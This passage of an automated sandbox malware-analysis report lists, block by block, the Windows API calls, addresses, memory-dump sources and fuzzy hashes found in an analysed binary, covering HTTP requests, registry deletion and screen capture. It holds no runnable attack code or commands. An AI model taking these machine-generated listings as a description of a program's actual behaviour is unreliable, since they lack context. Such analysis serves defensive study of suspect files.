                                                • CloseHandle.KERNEL32(?), ref: 0059B439
                                                • CloseHandle.KERNEL32(00000000), ref: 0059B44A
                                                • CloseHandle.KERNEL32(00000000), ref: 0059B45C
                                                • CloseHandle.KERNEL32(00000000), ref: 0059B46E
                                                • CloseHandle.KERNEL32(?), ref: 0059B4E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                • String ID:
                                                • API String ID: 2178637699-0
                                                • Opcode ID: 43a43014b1f580ad8b960684a5f6ab0ab09a79e9713ab0665f4e669329167644
                                                • Instruction ID: 22fa9e0d10ca38dedbe654ad8102f7799fe74ffb57dea26696b9a8f2fa066a33
                                                • Opcode Fuzzy Hash: 43a43014b1f580ad8b960684a5f6ab0ab09a79e9713ab0665f4e669329167644
                                                • Instruction Fuzzy Hash: 20F189316043019FEB14EF24D999B6ABFE5BF85310F14895DF8899B2A2DB31EC44CB52
                                                APIs
                                                • GetMenuItemCount.USER32(005E1990), ref: 00552F8D
                                                • GetMenuItemCount.USER32(005E1990), ref: 0055303D
                                                • GetCursorPos.USER32(?), ref: 00553081
                                                • SetForegroundWindow.USER32(00000000), ref: 0055308A
                                                • TrackPopupMenuEx.USER32(005E1990,00000000,?,00000000,00000000,00000000), ref: 0055309D
                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005530A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                • String ID: 0
                                                • API String ID: 36266755-4108050209
                                                • Opcode ID: 0bf0b179e99ad1848a27375bce4e52cc18e0209f0940dc1bb431f9664887faae
                                                • Instruction ID: af02a0ea856ff7407d1511b743f0a84c1853f589062e0e377b662b911064c1d2
                                                • Opcode Fuzzy Hash: 0bf0b179e99ad1848a27375bce4e52cc18e0209f0940dc1bb431f9664887faae
                                                • Instruction Fuzzy Hash: 59710C30640206BEFB259F64DC99FAABF68FF06364F204216F9256A1E0C7B1AD54D750
                                                APIs
                                                • DestroyWindow.USER32(?,?), ref: 005A6DEB
                                                  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 005A6E5F
                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005A6E81
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6E94
                                                • DestroyWindow.USER32(?), ref: 005A6EB5
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 005A6EE4
                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6EFD
                                                • GetDesktopWindow.USER32 ref: 005A6F16
                                                • GetWindowRect.USER32(00000000), ref: 005A6F1D
                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005A6F35
                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 005A6F4D
                                                  • Part of subcall function 00529944: GetWindowLongW.USER32(?,000000EB), ref: 00529952
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                • String ID: 0$tooltips_class32
                                                • API String ID: 2429346358-3619404913
                                                • Opcode ID: 506a175e713a4fc56172da299d6a9a383f13efea5092c41f58e99756c52f6758
                                                • Instruction ID: 3203997087ab0fa708173287b07fd1d54867da02243f37f160fb88a70989983f
                                                • Opcode Fuzzy Hash: 506a175e713a4fc56172da299d6a9a383f13efea5092c41f58e99756c52f6758
                                                • Instruction Fuzzy Hash: 92715B74144245AFDB25CF18DC84FABBFE9FB9A304F08041DF9998B2A1C770A949DB15
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058C4B0
                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0058C4C3
                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0058C4D7
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0058C4F0
                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0058C533
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0058C549
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0058C554
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0058C584
                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0058C5DC
                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0058C5F0
                                                • InternetCloseHandle.WININET(00000000), ref: 0058C5FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                • String ID:
                                                • API String ID: 3800310941-3916222277
                                                • Opcode ID: 0de946ff81234d531bb964b90ed3ced2c8a42ee93e6055016db4283a3cf7c6ac
                                                • Instruction ID: 2b1830867d0f22beec1514f2e3adb9b94de766b10f3f2ae826bf00e9bb3cd1cd
                                                • Opcode Fuzzy Hash: 0de946ff81234d531bb964b90ed3ced2c8a42ee93e6055016db4283a3cf7c6ac
                                                • Instruction Fuzzy Hash: 4F515DB1500205BFEB21AF64C948ABB7FFCFF19754F00441AF945A6210DB34E948AB70
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 005A8592
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85A2
                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85AD
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85BA
                                                • GlobalLock.KERNEL32(00000000), ref: 005A85C8
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85D7
                                                • GlobalUnlock.KERNEL32(00000000), ref: 005A85E0
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85E7
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 005A85F8
                                                • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,005AFC38,?), ref: 005A8611
                                                • GlobalFree.KERNEL32(00000000), ref: 005A8621
                                                • GetObjectW.GDI32(?,00000018,?), ref: 005A8641
                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 005A8671
                                                • DeleteObject.GDI32(?), ref: 005A8699
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 005A86AF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
                                                • Instruction ID: 5f37d3b040e4651022a9867580da52e8007f0476a1de009eac8babf7375f861b
                                                • Opcode Fuzzy Hash: c142638163b670bec78de0c767baafebf5741859c793f1e3d40871ee5266ff19
                                                • Instruction Fuzzy Hash: 9E41E675600208BFDB119FA5DC48EAE7FB8FF9AB11F144059F905EB260DB309905DB60
                                                APIs
                                                • VariantInit.OLEAUT32(00000000), ref: 00581502
                                                • VariantCopy.OLEAUT32(?,?), ref: 0058150B
                                                • VariantClear.OLEAUT32(?), ref: 00581517
                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 005815FB
                                                • VarR8FromDec.OLEAUT32(?,?), ref: 00581657
                                                • VariantInit.OLEAUT32(?), ref: 00581708
                                                • SysFreeString.OLEAUT32(?), ref: 0058178C
                                                • VariantClear.OLEAUT32(?), ref: 005817D8
                                                • VariantClear.OLEAUT32(?), ref: 005817E7
                                                • VariantInit.OLEAUT32(00000000), ref: 00581823
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                • API String ID: 1234038744-3931177956
                                                • Opcode ID: 9a3d38d32e5b81ba8e8486362f8bbeb01862d5c81780f4cca55b6c5f0e73332a
                                                • Instruction ID: 980ad9e6b04b45b22e0d3514e6d0f2b74c22002dd6da3711dbea11301e905e12
                                                • Opcode Fuzzy Hash: 9a3d38d32e5b81ba8e8486362f8bbeb01862d5c81780f4cca55b6c5f0e73332a
                                                • Instruction Fuzzy Hash: 4BD1E271A00916DBDB10AF65E889B7DBFB9BF86700F10846AE846BB180DB30DC46DF55
                                                APIs
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                  • Part of subcall function 0059C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059C9F1
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA68
                                                  • Part of subcall function 0059C998: _wcslen.LIBCMT ref: 0059CA9E
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059B6F4
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059B772
                                                • RegDeleteValueW.ADVAPI32(?,?), ref: 0059B80A
                                                • RegCloseKey.ADVAPI32(?), ref: 0059B87E
                                                • RegCloseKey.ADVAPI32(?), ref: 0059B89C
                                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0059B8F2
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059B904
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059B922
                                                • FreeLibrary.KERNEL32(00000000), ref: 0059B983
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0059B994
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 146587525-4033151799
                                                • Opcode ID: 6a1a88d45215d4979a5948132567b1484d54f2d3b5c5c73003281dc6ee59eb80
                                                • Instruction ID: 4ec804f3d070aa3baf3fd6b8bd418a48a303274b3022ac858df8b860c9b2d091
                                                • Opcode Fuzzy Hash: 6a1a88d45215d4979a5948132567b1484d54f2d3b5c5c73003281dc6ee59eb80
                                                • Instruction Fuzzy Hash: B9C17D30204202AFEB10DF14D599F6ABFE5FF84308F14855CE59A4B2A2CB75ED86CB91
                                                APIs
                                                • GetDC.USER32(00000000), ref: 005925D8
                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 005925E8
                                                • CreateCompatibleDC.GDI32(?), ref: 005925F4
                                                • SelectObject.GDI32(00000000,?), ref: 00592601
                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0059266D
                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 005926AC
                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 005926D0
                                                • SelectObject.GDI32(?,?), ref: 005926D8
                                                • DeleteObject.GDI32(?), ref: 005926E1
                                                • DeleteDC.GDI32(?), ref: 005926E8
                                                • ReleaseDC.USER32(00000000,?), ref: 005926F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: 3771a5d100dbf3c6ed9c1b56c2a6246e6ad4e43d3aa2691de95fad4d6a925eb2
                                                • Instruction ID: 3c1a2fd0e8e0f01e1f23edcf63cf8a97ac779e41231635b2ac480e4f37ea9cc5
                                                • Opcode Fuzzy Hash: 3771a5d100dbf3c6ed9c1b56c2a6246e6ad4e43d3aa2691de95fad4d6a925eb2
                                                • Instruction Fuzzy Hash: A061D275E00219EFCF05CFA8D988AAEBBF5FF58310F208529E956A7250D770A941DF90
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 0054DAA1
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D659
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D66B
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D67D
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D68F
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6A1
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6B3
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6C5
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6D7
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6E9
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D6FB
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D70D
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D71F
                                                  • Part of subcall function 0054D63C: _free.LIBCMT ref: 0054D731
                                                • _free.LIBCMT ref: 0054DA96
                                                  • Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
                                                  • Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0
                                                • _free.LIBCMT ref: 0054DAB8
                                                • _free.LIBCMT ref: 0054DACD
                                                • _free.LIBCMT ref: 0054DAD8
                                                • _free.LIBCMT ref: 0054DAFA
                                                • _free.LIBCMT ref: 0054DB0D
                                                • _free.LIBCMT ref: 0054DB1B
                                                • _free.LIBCMT ref: 0054DB26
                                                • _free.LIBCMT ref: 0054DB5E
                                                • _free.LIBCMT ref: 0054DB65
                                                • _free.LIBCMT ref: 0054DB82
                                                • _free.LIBCMT ref: 0054DB9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: b3ae0baad26f4e2af38f5549d0badfd1301e6b9d7241c27b315384a19c02709b
                                                • Instruction ID: 2d6e3b6f5a3c5c42a1fc12d99973f5fba1c2b25e96e381818fc4bf4e6d23e272
                                                • Opcode Fuzzy Hash: b3ae0baad26f4e2af38f5549d0badfd1301e6b9d7241c27b315384a19c02709b
                                                • Instruction Fuzzy Hash: 28312A316046069FEB22AA3AE849BDA7FF9FF40318F55441AF449D7291DA35AC80CB30
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000100), ref: 0057369C
                                                • _wcslen.LIBCMT ref: 005736A7
                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00573797
                                                • GetClassNameW.USER32(?,?,00000400), ref: 0057380C
                                                • GetDlgCtrlID.USER32(?), ref: 0057385D
                                                • GetWindowRect.USER32(?,?), ref: 00573882
                                                • GetParent.USER32(?), ref: 005738A0
                                                • ScreenToClient.USER32(00000000), ref: 005738A7
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00573921
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0057395D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                • String ID: %s%u
                                                • API String ID: 4010501982-679674701
                                                • Opcode ID: b091d4a713847a398f5cf6878d371f3e932a002880d4072c36217f3b55f70b25
                                                • Instruction ID: 317b7c397bd0880e0e8153a9bc3f02a8e07af5eaf326be7df6a93a3a6328cd43
                                                • Opcode Fuzzy Hash: b091d4a713847a398f5cf6878d371f3e932a002880d4072c36217f3b55f70b25
                                                • Instruction Fuzzy Hash: D991B371204617AFD718DF24D885BAABFA8FF44360F008529FA9DD2190DB30EA45EB91
                                                APIs
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00574994
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 005749DA
                                                • _wcslen.LIBCMT ref: 005749EB
                                                • CharUpperBuffW.USER32(?,00000000), ref: 005749F7
                                                • _wcsstr.LIBVCRUNTIME ref: 00574A2C
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00574A64
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00574A9D
                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00574AE6
                                                • GetClassNameW.USER32(?,?,00000400), ref: 00574B20
                                                • GetWindowRect.USER32(?,?), ref: 00574B8B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                • String ID: ThumbnailClass
                                                • API String ID: 1311036022-1241985126
                                                • Opcode ID: 42d577b76fd0bda4483f780d65c0f34e8e3a9897fe1e0805741d6af090705f48
                                                • Instruction ID: 6862e355f64ae1b0f7a1f9936421b4d5cbe64e2ad6600e7fc6a1b810eebfb31d
                                                • Opcode Fuzzy Hash: 42d577b76fd0bda4483f780d65c0f34e8e3a9897fe1e0805741d6af090705f48
                                                • Instruction Fuzzy Hash: D891AA310042069FDB05DF14E985BAABFE9FF84314F04846AFD899A096EB30ED45DFA1
                                                APIs
                                                  • Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2
                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005A8D5A
                                                • GetFocus.USER32 ref: 005A8D6A
                                                • GetDlgCtrlID.USER32(00000000), ref: 005A8D75
                                                • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 005A8E1D
                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 005A8ECF
                                                • GetMenuItemCount.USER32(?), ref: 005A8EEC
                                                • GetMenuItemID.USER32(?,00000000), ref: 005A8EFC
                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 005A8F2E
                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005A8F70
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005A8FA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                • String ID: 0
                                                • API String ID: 1026556194-4108050209
                                                • Opcode ID: 5cfac13686f633300e01b23d4243c478be06b0924e3e4b9303c259ba02cec675
                                                • Instruction ID: fbe2605fa42ec8feb1f36669579a9faec27f22c9a864aecfae981815a84f2d8a
                                                • Opcode Fuzzy Hash: 5cfac13686f633300e01b23d4243c478be06b0924e3e4b9303c259ba02cec675
                                                • Instruction Fuzzy Hash: 25818C71508302AFDB20CF24D888ABFBFE9FB9A354F140919F98597291DB70D905DBA1
                                                APIs
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0059CC64
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0059CC8D
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059CD48
                                                  • Part of subcall function 0059CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0059CCAA
                                                  • Part of subcall function 0059CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0059CCBD
                                                  • Part of subcall function 0059CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0059CCCF
                                                  • Part of subcall function 0059CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0059CD05
